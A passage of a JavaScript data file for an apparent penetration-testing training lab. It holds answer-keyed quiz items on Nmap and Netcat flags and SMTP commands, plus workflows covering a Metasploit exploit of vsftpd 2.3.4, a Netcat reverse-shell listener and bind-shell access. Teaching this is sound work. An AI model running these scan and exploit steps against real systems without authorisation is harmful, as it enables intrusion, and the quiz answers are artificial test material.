  makeChoice("post", "intermediate", "Set the recipient address during the SMTP interaction.", "The sender was already accepted.", CYBER_COMMANDS.rcptTo, "Choose the command that defines the recipient.", "RCPT TO is how you name the recipient in the SMTP flow.", "post", [CYBER_COMMANDS.data, CYBER_COMMANDS.quit, CYBER_COMMANDS.ehlo]),
  makeChoice("post", "intermediate", "Switch the SMTP session into message-body mode.", "The recipient has already been accepted.", CYBER_COMMANDS.data, "Use the command that begins content entry.", "DATA tells the server that message content is about to follow.", "post", [CYBER_COMMANDS.quit, CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.rcptTo]),
  makeChoice("post", "intermediate", "Close the SMTP session cleanly.", "End the protocol conversation instead of dropping the socket.", CYBER_COMMANDS.quit, "Use the SMTP exit verb.", "QUIT closes the session properly and tells the server the conversation is complete.", "post", [CYBER_COMMANDS.data, CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.rcptTo])
];
const flagQuestions = [
  makeFlag("recon", "beginner", "Which Nmap flag lets you target specific ports like 80 or 21,22,80?", "Pick the option that scopes the port list.", ["-p", "-O", "-sV", "--exclude"], "-p", "This flag is about port selection.", "-p tells Nmap exactly which port or ports to scan."),
  makeFlag("recon", "beginner", "Which Nmap option reads targets from a file such as targets.txt?", "Use the host list file instead of typing addresses one by one.", ["-iL", "-oN", "-T4", "-sT"], "-iL", "This flag points Nmap at a list file.", "-iL tells Nmap to load targets from a file."),
  makeFlag("recon", "beginner", "Which Nmap option skips a specific host during a scan?", "You want to avoid the gateway.", ["--exclude", "-iL", "-oX", "-p"], "--exclude", "This option removes a host from scope.", "--exclude is the flag that omits a target from the scan."),
  makeFlag("recon", "beginner", "Which output flag writes a human-readable normal text report?", "Choose the normal output format.", ["-oN", "-oX", "-oA", "-sV"], "-oN", "The N stands for normal text output.", "-oN writes a normal text report that humans can read easily."),
  makeFlag("recon", "beginner", "Which output flag writes XML results for tooling or parsing?", "Choose the structured output format.", ["-oX", "-oN", "-oA", "--top-ports"], "-oX", "The X points to XML.", "-oX saves the scan in XML format for machine-friendly use."),
  makeFlag("recon", "intermediate", "Which Nmap option writes all major output formats with one base name?", "You want one command to save several report styles.", ["-oA", "-oX", "-oN", "--exclude"], "-oA", "This is the all-output shortcut.", "-oA saves multiple output styles together under one base name."),
  makeFlag("enum", "beginner", "Which Nmap flag enables operating system detection?", "You want an OS guess, not service versions.", ["-O", "-sV", "-sS", "-T4"], "-O", "This is the capital O option.", "-O activates OS detection in Nmap."),
  makeFlag("enum", "beginner", "Which Nmap flag enables service version detection?", "You want the exact software and version on open ports.", ["-sV", "-O", "-sU", "--top-ports"], "-sV", "The V refers to version.", "-sV tells Nmap to probe services and identify versions."),
  makeFlag("recon", "intermediate", "Which Nmap scan flag performs a TCP SYN scan?", "Choose the common stealth-oriented TCP scan type.", ["-sS", "-sT", "-sU", "-p"], "-sS", "This is the SYN scan option.", "-sS performs a SYN scan rather than a full TCP connect."),
  makeFlag("recon", "intermediate", "Which Nmap scan flag performs a full TCP connect scan?", "Use the scan that completes the handshake.", ["-sT", "-sS", "-sU", "-O"], "-sT", "This is the connect scan option.", "-sT performs a full TCP connect scan."),
  makeFlag("recon", "intermediate", "Which Nmap scan flag switches to UDP scanning?", "You need to test services like DNS or SNMP.", ["-sU", "-sS", "-sV", "-iL"], "-sU", "The U stands for UDP.", "-sU tells Nmap to scan UDP ports instead of TCP."),
  makeFlag("recon", "intermediate", "Which Nmap timing flag is commonly used to speed up scans in a lab?", "Choose the faster timing template.", ["-T4", "-sV", "-oN", "-O"], "-T4", "This is one of the timing templates.", "-T4 increases scan speed and is common in lab environments where aggressive timing is acceptable."),
  makeFlag("recon", "intermediate", "Which Nmap option scans the most common ports instead of a custom list?", "You want a quick top-ports pass.", ["--top-ports", "--exclude", "-oA", "-iL"], "--top-ports", "This option accepts a number of top ports to scan.", "--top-ports tells Nmap to scan the most common ports up to the number you specify."),
  makeFlag("recon", "advanced", "You want to save a scan as normal text. Which flag belongs before the filename?", "The filename might be scan.txt.", ["-oN", "-oX", "-oA", "-iL"], "-oN", "Choose the normal output flag.", "-oN goes before the filename when you want a normal text report."),
  makeFlag("recon", "advanced", "You want Nmap results in XML for a parser. Which flag belongs before the file name?", "The file might be scan.xml.", ["-oX", "-oN", "-oA", "--top-ports"], "-oX", "Pick the XML output flag.", "-oX is the correct flag for XML output."),
  makeFlag("recon", "advanced", "You want normal, XML, and related outputs from one scan. Which flag is built for that?", "This uses a base name instead of separate file commands.", ["-oA", "-oN", "-oX", "-T4"], "-oA", "Think all output formats.", "-oA is the all-output shortcut and saves multiple useful formats together."),
  makeFlag("post", "beginner", "In Netcat, which flag keeps name resolution off and uses numeric addresses only?", "This is useful when you want direct IP-based behavior.", ["-n", "-v", "-l", "-p"], "-n", "This flag prevents DNS lookups.", "-n tells Netcat to avoid DNS resolution and use numeric addresses directly."),
  makeFlag("post", "beginner", "In Netcat, which flag enables verbose connection output?", "You want more connection detail on screen.", ["-v", "-n", "-l", "-p"], "-v", "Verbose means more visible detail.", "-v enables verbose output so you can see more about the connection."),
  makeFlag("post", "beginner", "In Netcat, which flag puts the socket into listen mode?", "You are waiting for the remote side to connect in.", ["-l", "-p", "-n", "-v"], "-l", "This flag is for listening, not connecting.", "-l tells Netcat to listen for an inbound connection."),
  makeFlag("post", "beginner", "In Netcat, which flag specifies the local port number to use?", "You want to listen on port 4444 or 9001.", ["-p", "-l", "-n", "-v"], "-p", "This flag sets the port value.", "-p is the flag used to specify the local port for Netcat."),
  makeFlag("post", "intermediate", "You want a verbose numeric Netcat connection to a remote service. Which pair of flags matter most?", "Focus on readability and avoiding name lookups.", ["-n and -v", "-l and -p", "-v and -l", "-p and -n"], "-n and -v", "One disables DNS and one increases output.", "-n avoids DNS lookups and -v adds detail, which is why they are often paired."),
  makeFlag("post", "intermediate", "You are building a Netcat listener. Which two flags are the core of that behavior?", "One tells Netcat to listen and one tells it which port to use.", ["-l and -p", "-n and -v", "-l and -n", "-v and -p"], "-l and -p", "Think listening plus a chosen local port.", "-l puts Netcat into listen mode and -p specifies the listening port."),
  makeFlag("post", "advanced", "In `nc -lvnp 4444`, which flag is responsible for the port value that follows?", "Only one flag expects the local port number.", ["-p", "-l", "-v", "-n"], "-p", "It is the port-setting flag.", "-p is the flag that tells Netcat which local port number to use."),
  makeFlag("post", "advanced", "In `nc -lvnp 4444`, which flag actually places Netcat into a listening role?", "Without this flag, the command would not wait for inbound connections.", ["-l", "-p", "-n", "-v"], "-l", "This flag means listen.", "-l is the flag that makes Netcat listen instead of connect outward."),
  makeFlag("recon", "advanced", "You only want the top 20 common ports. Which Nmap option controls that selection?", "Choose the top-ports option.", ["--top-ports", "-p", "-iL", "-sV"], "--top-ports", "This option works with a number of common ports.", "--top-ports limits the scan to the most common ports instead of a custom list or full range."),
  makeFlag("enum", "advanced", "You already know the host is up. Which flag turns open ports into named services and versions?", "Choose the versioning option.", ["-sV", "-O", "-sS", "-T4"], "-sV", "You want service identification, not OS fingerprinting.", "-sV is the Nmap flag that probes services and reports versions.")
];

const workflows = [
  makeWorkflow("Basic Nmap Recon", "recon", "beginner", "Walk from initial discovery into a focused web check and report capture.", [
    makeChoice("recon", "beginner", "You have one target and need the first useful overview. What comes first?", `Start with ${CYBER_TARGET}.`, CYBER_COMMANDS.scanBasic, "Begin with general Nmap discovery.", "The first step is a broad initial scan so you know what ports are even worth deeper work.", "recon", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ssh, CYBER_COMMANDS.ncSmtp]),
    makeChoice("recon", "beginner", "The first scan showed signs of web exposure. What focused follow-up should come next?", "Limit scope to the common web ports.", CYBER_COMMANDS.scanWeb, "Now narrow to 80 and 443.", "Once web exposure looks possible, a focused scan of 80 and 443 is the next efficient move.", "recon", [CYBER_COMMANDS.udp53, CYBER_COMMANDS.os, CYBER_COMMANDS.searchVsftpd]),
    makeChoice("enum", "beginner", "A web port is open. What should you do before considering any exploit path?", "Turn the open port into a service identity.", CYBER_COMMANDS.versionWeb, "Get the exact web service version first.", "Version data is what makes the result actionable. Exploitation without it is guesswork.", "enum", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ncListener, CYBER_COMMANDS.telnet]),
    makeChoice("recon", "beginner", "You want a readable report from this recon chain. What final command fits?", "Save the result in normal text format.", CYBER_COMMANDS.outputNormal, "Use the normal output flag.", "A normal text output file is the simplest way to preserve the recon results for review.", "recon", [CYBER_COMMANDS.outputXml, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanBasic])
  ]),
  makeWorkflow("Service Version Workflow", "enum", "beginner", "Move from a general scan into service and OS evidence before exploitation.", [
    makeChoice("recon", "beginner", "You are beginning against a fresh host. What should you run first?", "Start broad before going specific.", CYBER_COMMANDS.scanBasic, "First discover the port surface.", "A basic scan comes before versioning because you need to know where to focus.", "recon", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.ssh]),
    makeChoice("enum", "beginner", "You now know the host has open ports. What is the next enumeration step?", "Move from open ports to service identities.", CYBER_COMMANDS.version, "Use Nmap's service version detection.", "Version detection is the next step because it turns open ports into named services with versions.", "enum", [CYBER_COMMANDS.os, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.msfconsole]),
    makeChoice("enum", "intermediate", "You want host-level OS clues to support your service findings. What comes next?", "This is still evidence gathering.", CYBER_COMMANDS.os, "Use the operating system fingerprint option.", "OS detection complements service versioning and helps confirm what kind of host you are dealing with.", "enum", [CYBER_COMMANDS.msfRun, CYBER_COMMANDS.ncPort6200, CYBER_COMMANDS.telnet]),
    makeChoice("enum", "intermediate", "You want to hand these findings to a teammate in a normal text report. What is the last step?", "Choose the readable output format.", CYBER_COMMANDS.outputNormal, "Use the normal text report flag.", "A normal text report is the cleanest handoff artifact for quick human review.", "enum", [CYBER_COMMANDS.outputXml, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanFromFile])
  ]),
  makeWorkflow("Subnet Recon Workflow", "recon", "intermediate", "Handle a multi-host lab by scanning the subnet, excluding infrastructure, and preserving output.", [
    makeChoice("recon", "beginner", "You need to map the local lab subnet. What is the right first command?", `Use ${CYBER_SUBNET}.`, CYBER_COMMANDS.scanSubnet, "Point Nmap at the subnet CIDR.", "Scanning the subnet gives you the first view of which hosts are up across the range.", "recon", [CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.syn]),
    makeChoice("recon", "intermediate", "You decide the gateway should be out of scope. What is the next improved command?", `Exclude ${CYBER_GATEWAY}.`, CYBER_COMMANDS.scanSubnetExclude, "Use the exclusion option with the subnet command.", "Refining the subnet scan with --exclude keeps the recon cleaner and avoids touching the gateway.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanServices]),
    makeChoice("recon", "intermediate", "You want a faster pass across the target set before deep enumeration. What is the next move?", "Prefer the top ports rather than a broad custom list.", `nmap --top-ports 20 ${CYBER_SUBNET} --exclude ${CYBER_GATEWAY}`, "Use top ports on the subnet with the same exclusion in place.", "A top-ports pass across the subnet is a practical second-stage sweep when you want quick triage.", "recon", [CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.version, CYBER_COMMANDS.os]),
    makeChoice("recon", "intermediate", "You want all major result formats from this subnet exercise. What do you run?", "Choose the multi-format output option.", CYBER_COMMANDS.outputAll, "Use the all-output flag.", "-oA saves several report formats together, which is useful when subnet scans need both human and tool review.", "recon", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.scanFromFile])
  ]),
  makeWorkflow("Target File Workflow", "recon", "intermediate", "Work from a prepared host list, narrow to web services, and produce XML output for tooling.", [
    makeChoice("recon", "beginner", "You already have a target list in a file. What should you use first?", `The file is ${CYBER_TARGETS_FILE}.`, CYBER_COMMANDS.scanFromFile, "Use the file-input flag.", "When the target list already exists, loading it directly is the cleanest starting point.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputNormal]),
    makeChoice("recon", "intermediate", "Now narrow the target file scan to just HTTP and HTTPS. What is next?", "Focus the file-based scan on the web ports.", CYBER_COMMANDS.scanFileWeb, "Keep -iL and add the web port list.", "The right follow-up is to keep the file input and add a focused web port scope.", "recon", [CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.version, CYBER_COMMANDS.os]),
    makeChoice("enum", "intermediate", "You see web ports open on several hosts. What comes next before research?", "Turn those open ports into version evidence.", `nmap -iL ${CYBER_TARGETS_FILE} -p 80,443 -sV`, "Keep the same target file and web scope, then add service versioning.", "Service version detection is the bridge between open web ports and meaningful next-step analysis.", "enum", [CYBER_COMMANDS.outputXml, CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.scanServices]),
    makeChoice("enum", "intermediate", "You want the results in a format another tool can parse. What final output step fits?", "Choose XML output.", CYBER_COMMANDS.outputXml, "Use the XML output flag.", "XML is the correct handoff format when the results need to be consumed programmatically.", "enum", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanBasic])
  ]),
  makeWorkflow("FTP Exploit Workflow", "exploit", "intermediate", "Confirm the service, research the version, load the right module, and verify the resulting shell path.", [
    makeChoice("enum", "beginner", "Port 21 is open and you suspect vsftpd. What must happen before exploit research?", "Confirm the FTP service and version first.", CYBER_COMMANDS.versionFTP, "Version first, research second.", "Service versioning is what justifies the exploit research step that follows.", "enum", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ncPort6200]),
    makeChoice("exploit", "beginner", "The service looks like vsftpd 2.3.4. What is the next evidence-based move?", "Use a local exploit reference search.", CYBER_COMMANDS.searchVsftpd, "Search the exploit database for the exact version.", "Matching the exact version in searchsploit gives you confidence that the exploit path is relevant.", "exploit", [CYBER_COMMANDS.msfRun, CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ssh]),
    makeChoice("exploit", "beginner", "You want to try the framework-assisted exploit path next. What do you open?", "Move into Metasploit.", CYBER_COMMANDS.msfconsole, "Launch the framework console.", "msfconsole is required before you can search or load exploit modules.", "exploit", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.telnet]),
    makeChoice("exploit", "intermediate", "Inside Metasploit, what is the cleanest final chain for this module?", "Think search, use, target, run.", `${CYBER_COMMANDS.msfSearchVsftpd} -> ${CYBER_COMMANDS.msfUseVsftpd} -> ${CYBER_COMMANDS.msfSetRhosts} -> ${CYBER_COMMANDS.msfRun}`, "Find the module, load it, set the host, then execute.", "That preserves the correct Metasploit order from module discovery to exploit execution.", "exploit", [`${CYBER_COMMANDS.msfRun} -> ${CYBER_COMMANDS.msfSetRhosts}`, `${CYBER_COMMANDS.searchVsftpd} -> ${CYBER_COMMANDS.msfRun}`, `${CYBER_COMMANDS.ncListener} -> ${CYBER_COMMANDS.msfRun}`])
  ])
];
workflows.push(
  makeWorkflow("Metasploit Service Workflow", "exploit", "intermediate", "Take a discovered service from version evidence to a controlled Metasploit execution path.", [
    makeChoice("recon", "beginner", "You are starting on a fresh host. What comes first?", "Do not skip recon.", CYBER_COMMANDS.scanBasic, "Start with an initial port scan.", "Recon comes first because you need to know what is reachable before you think about modules.", "recon", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ssh, CYBER_COMMANDS.ncListener]),
    makeChoice("enum", "beginner", "You found open ports. What should you do next to identify the service properly?", "Use version detection.", CYBER_COMMANDS.version, "Get service versions before you research exploits.", "Service versioning is the link between discovery and exploit selection.", "enum", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.telnet]),
    makeChoice("exploit", "beginner", "You now have a service/version match worth testing. What is the next move?", "Move into the exploitation framework.", CYBER_COMMANDS.msfconsole, "Launch Metasploit.", "Once you have evidence, opening Metasploit is the next practical step toward controlled exploitation.", "exploit", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanServices]),
    makeChoice("exploit", "beginner", "The module is already selected. What configuration should come immediately before execution?", `Use ${CYBER_TARGET} as the target.`, CYBER_COMMANDS.msfSetRhosts, "Set the target host option.", "The module needs RHOSTS set so it knows where to run.", "exploit", [CYBER_COMMANDS.msfRun, CYBER_COMMANDS.msfSearchSamba, CYBER_COMMANDS.searchSamba])
  ]),
  makeWorkflow("SMTP Netcat Workflow", "post", "intermediate", "Use Netcat to connect to SMTP and walk through the core protocol sequence in order.", [
    makeChoice("enum", "advanced", "You want to talk directly to SMTP on the target. What starts the workflow?", "Connect to port 25 with Netcat.", CYBER_COMMANDS.ncSmtp, "Use nc to connect to the SMTP port.", "Netcat gives you a raw TCP session to SMTP, which is what this workflow needs.", "enum", [CYBER_COMMANDS.ssh, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputNormal]),
    makeChoice("post", "intermediate", "The SMTP banner is visible. What should you send first?", "Start the protocol conversation properly.", CYBER_COMMANDS.ehlo, "Identify the client first.", "EHLO is the standard opening verb after the SMTP banner.", "post", [CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.data, CYBER_COMMANDS.quit]),
    makeChoice("post", "intermediate", "The greeting worked. What is the next SMTP command?", "Define the envelope sender.", CYBER_COMMANDS.mailFrom, "Sender before recipient.", "MAIL FROM establishes the sender and must happen before you set the recipient.", "post", [CYBER_COMMANDS.rcptTo, CYBER_COMMANDS.quit, CYBER_COMMANDS.data]),
    makeChoice("post", "intermediate", "The sender was accepted. What is the next command?", "Move to the recipient stage.", CYBER_COMMANDS.rcptTo, "Specify the recipient next.", "RCPT TO is how you tell the server who should receive the message.", "post", [CYBER_COMMANDS.data, CYBER_COMMANDS.quit, CYBER_COMMANDS.ehlo])
  ]),
  makeWorkflow("Reverse Shell Listener Workflow", "post", "advanced", "Prepare for a reverse shell, launch the exploit, and catch the callback in the right order.", [
    makeChoice("enum", "intermediate", "Before you expect a callback, what should already exist?", "Choose the proper pre-exploit step.", CYBER_COMMANDS.version, "You should still be operating from evidence, not guesswork.", "You only prepare a callback after you have enough scan evidence to justify the exploit path.", "enum", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.telnet, CYBER_COMMANDS.quit]),
    makeChoice("post", "beginner", "You are about to trigger a reverse shell. What must you do first on your own box?", "The shell needs somewhere to land.", CYBER_COMMANDS.ncListener, "Set up a local listener before the callback.", "A reverse shell fails if nothing is listening on your side when the target attempts the connection.", "post", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ssh, CYBER_COMMANDS.msfRun]),
    makeChoice("exploit", "beginner", "Your listener is ready and the exploit module is configured. What now?", "Trigger the callback.", CYBER_COMMANDS.msfRun, "Run the prepared exploit.", "With the listener waiting and the module configured, run is the step that attempts the shell.", "exploit", [CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputXml]),
    makeChoice("post", "advanced", "The reverse shell connects back successfully. What is the practical result?", "Think in terms of where access now lives.", "Interact with the shell inside the Netcat listener", "The shell is already in the connection you prepared.", "Once the callback lands, the active Netcat listener becomes your live shell interface.", "post", ["Start a new listener on another port", "Rerun the same exploit immediately", "Close the listener and reconnect with Telnet"])
  ]),
  makeWorkflow("Bind Shell Workflow", "post", "advanced", "Differentiate a bind shell from a reverse shell and connect the right way after exploitation.", [
    makeChoice("enum", "intermediate", "What should happen before you ever expect a bind shell on the host?", "Stay disciplined about the progression.", CYBER_COMMANDS.version, "Evidence comes before exploitation.", "Version evidence is still the bridge into any exploit path, including one that may expose a bind shell.", "enum", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.telnet]),
    makeChoice("exploit", "beginner", "The exploit path is chosen and configured. What comes next?", "Trigger the exploit that may open a listening port.", CYBER_COMMANDS.msfRun, "Run the exploit module.", "A bind shell only appears after the exploit actually executes successfully.", "exploit", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ehlo]),
    makeChoice("post", "beginner", "The target is now believed to be listening on TCP 4444. What should you do?", "This is not a callback scenario.", CYBER_COMMANDS.ncBind, "Connect to the target instead of listening locally.", "A bind shell means the remote side is listening. Your next move is to connect outward to it.", "post", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ssh, CYBER_COMMANDS.quit]),
    makeChoice("post", "advanced", "Once the bind shell works, which statement best matches the next principle?", "Choose the best access-focused decision.", "Verify what access you have and decide whether a more stable shell is needed", "Do not confuse initial access with stable access.", "Landing a shell is not the end state. You still need to assess stability, privileges, and next access decisions.", "post", ["Immediately rerun the exploit several times", "Switch to Telnet even if SSH is available", "Delete your scan outputs before taking notes"])
  ]),
  makeWorkflow("UDP Enumeration Workflow", "enum", "advanced", "Use a cautious sequence for UDP services instead of jumping straight to exploitation.", [
    makeChoice("recon", "beginner", "You are starting on a host that may expose both TCP and UDP services. What comes first?", "Begin with a normal port discovery step.", CYBER_COMMANDS.scanBasic, "Start with the normal broad Nmap scan.", "Even when UDP matters, the workflow still starts with general discovery rather than assumptions.", "recon", [CYBER_COMMANDS.udpEnum, CYBER_COMMANDS.searchSamba, CYBER_COMMANDS.msfconsole]),
    makeChoice("enum", "intermediate", "You suspect DNS and SNMP are relevant. What is the next focused step?", "Check those UDP services directly.", CYBER_COMMANDS.udpEnum, "Use a UDP scan with the specific ports.", "Targeted UDP enumeration is the right follow-up when specific UDP services matter.", "enum", [CYBER_COMMANDS.syn, CYBER_COMMANDS.connect, CYBER_COMMANDS.outputXml]),
    makeChoice("enum", "intermediate", "You want these findings in a format a parser can ingest. What should follow?", "Use a structured report format.", CYBER_COMMANDS.outputXml, "Pick XML output.", "XML output is useful when you want to feed the results into later tooling.", "enum", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.version]),
    makeChoice("exploit", "advanced", "Before exploiting anything from the UDP results, what principle should guide the next step?", "Choose the best next-action mindset.", "Confirm the service and context before selecting an exploit path", "Enumeration should reduce uncertainty before exploitation.", "UDP findings still need confirmation and context. Exploit choices should come from evidence, not impatience.", "exploit", ["Exploit the first open port immediately", "Switch to SSH regardless of results", "Ignore the UDP findings because TCP is easier"])
  ])
);

window.CYBER_LAB_DATA = {
  targetIp: CYBER_TARGET,
  sectionCards: CYBER_SECTION_CARDS,
  scenarioQuestions,
  commandQuestions,
  flagQuestions,
  workflows
};
